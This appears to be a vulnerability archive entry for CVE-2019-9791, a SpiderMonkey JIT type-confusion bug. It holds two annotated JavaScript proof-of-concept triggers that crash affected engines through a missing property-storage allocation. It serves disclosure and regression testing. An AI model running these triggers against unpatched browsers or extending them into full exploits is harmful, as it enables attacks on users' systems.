
CVE-2019-9791.md


CVE-2019-9791

  • Report: Feb 2019
  • Fix: Mar 2019
  • Credit: Samuel Gross, Google Project Zero

PoC

// Run with --no-threads --ion-warmup-threshold=100
/**
 * Constructor used as the trigger object for CVE-2019-9791.
 *
 * The call sites below construct it many times with a double `val` and a
 * one-iteration loop, then once with a string `val` and a very long loop.
 * The change in the type of `val` and the long-running loop are presumably
 * what drive the JIT tiering and the unboxed-object rollback described in
 * the comments (the run flags above set the Ion warm-up threshold) — TODO
 * confirm against the original report. The exact counts matter, so treat
 * this as a regression reproducer for the affected SpiderMonkey builds,
 * not as portable code.
 *
 * @param {number|string} val - first own property; its type differs between call sites.
 * @param {number} l - iteration count of the empty loop that precedes the later stores.
 */
function Hax(val, l) {
    this.a = val;

    // Empty loop: only its iteration count matters. A long loop here
    // presumably lets the JIT enter mid-constructor (on-stack replacement)
    // — TODO confirm; the loop body itself does nothing.
    for (let i = 0; i < l; i++) {}

    this.x = 42;
    this.y = 42;
    // After conversion to a NativeObject, this property
    // won't fit into inline storage, but out-of-line storage
    // has not been allocated, resulting in a crash @ 0x0.
    // (Original author's comment. On an engine without this bug the
    // store is an ordinary property write and nothing unusual happens.)
    this.z = 42;
}

// Warm-up phase: 10000 constructions with a double `val` and a
// one-iteration loop, followed by a single construction with a string
// `val` and a 1,000,000-iteration loop. The type change on `val` in the
// final call is presumably what forces the rollback described in Hax's
// comments — TODO confirm against the report.
for (let i = 0; i < 10000; i++) {
    new Hax(13.37, 1);
}
// `obj` is not used again in this sample; the construction itself is the trigger.
let obj = new Hax("asdf", 1000000);

Original sample

/**
 * Constructor from the original (fuzzer-style) sample as reported.
 *
 * `v8` selects the trigger path: when truthy the constructor first builds a
 * nested instance via `new v5(v6)` (no second argument, so the inner call
 * skips this branch and recursion depth is one), then iterates over a
 * freshly allocated Float32Array, and finally performs the property store
 * on `this`. The original comments attribute the crash to the nested call
 * triggering the rollback and to the store landing before out-of-line
 * property storage exists.
 *
 * @param {*} v6 - value stored under the negative numeric key.
 * @param {boolean} [v8] - when truthy, takes the triggering path.
 */
function v5(v6, v8) {
    if (v8) {
        // Triggers the rollback etc. in a recursive call.
        const v11 = new v5(v6);
        // The typed array is never read; the loop presumably exists only
        // for its allocation side effects — TODO confirm.
        const v13 = new Float32Array(40183);
        for (const v14 of v13) {
        }
    }
    // This property assignment crashes as out-of-line 
    // property storage has not been allocated yet.
    // Note: -3083318214 is not a valid array index, so this stores to the
    // string-keyed property "-3083318214" rather than an array element.
    this[-3083318214] = v6;
}
// 1337 warm-up constructions on the non-triggering path (v8 = false),
// then a single construction with v8 = true that takes the branch. The
// warm-up count is presumably tuned to the JIT thresholds in the run
// flags noted above — TODO confirm.
for (let v19 = 0; v19 < 1337; v19++) {
    const v21 = new v5(32768, false);
}
// The first argument here is the constructor itself; per the comments
// above the code path taken is what matters, so the value is presumably
// incidental. `v22` is not used again in this sample.
const v22 = new v5(v5, true);

Reference